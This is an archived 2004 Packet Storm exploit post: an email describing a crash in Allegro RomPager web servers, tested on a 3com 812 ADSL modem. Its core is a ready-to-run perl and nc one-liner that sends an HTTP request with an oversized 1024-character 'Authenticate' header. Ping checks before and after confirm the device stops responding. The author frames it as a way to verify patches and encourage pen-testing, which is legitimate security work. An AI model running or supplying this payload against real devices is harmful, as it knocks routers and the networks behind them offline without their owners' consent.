allegrodos.txt

2004-05-24T00:00:00
ID PACKETSTORM:33399
Type packetstorm
Reporter Seth Alan Woolley
Modified 2004-05-24T00:00:00

Description

                                        
                                            `The description made it easy to create this one. Needed this to confirm  
if some 2.10-branded products were in fact patched and warranted  
replacing. Considering there was four years of warning and there are  
still tons of boxes with this problem, please, people, get your systems  
pen-tested.  
  
http://www.securityfocus.com/bid/1290/discussion/  
http://www.securityfocus.com/bid/1290/exploit/ (none yet)  
http://www.allegrosoft.com/rpproduct.html  
  
$ ip_address="some.ip.add.ress"  
$ ping $ip_address # works  
  
the one-liner:  
$ perl -e 'print "GET / HTTP/1.1\r\nHost: '"$ip_address"'\r\nAuthenticate: " . 'A' x 1024 . "\r\n\r\n"' | nc "$ip_address" 80  
  
$ ping $ip_address # doesn't work  
  
Tested against a 3com 812 adsl modem.  
  
This email is in the Public Domain.  
  
--   
Seth Alan Woolley [seth at positivism.org], SPAM/UCE is unauthorized  
Key id EF10E21A = 36AD 8A92 8499 8439 E6A8 3724 D437 AF5D EF10 E21A  
http://smgl.positivism.org:11371/pks/lookup?op=get&search=0xEF10E21A  
Security Team Leader Source Mage GNU/Linux http://www.sourcemage.org  
  
`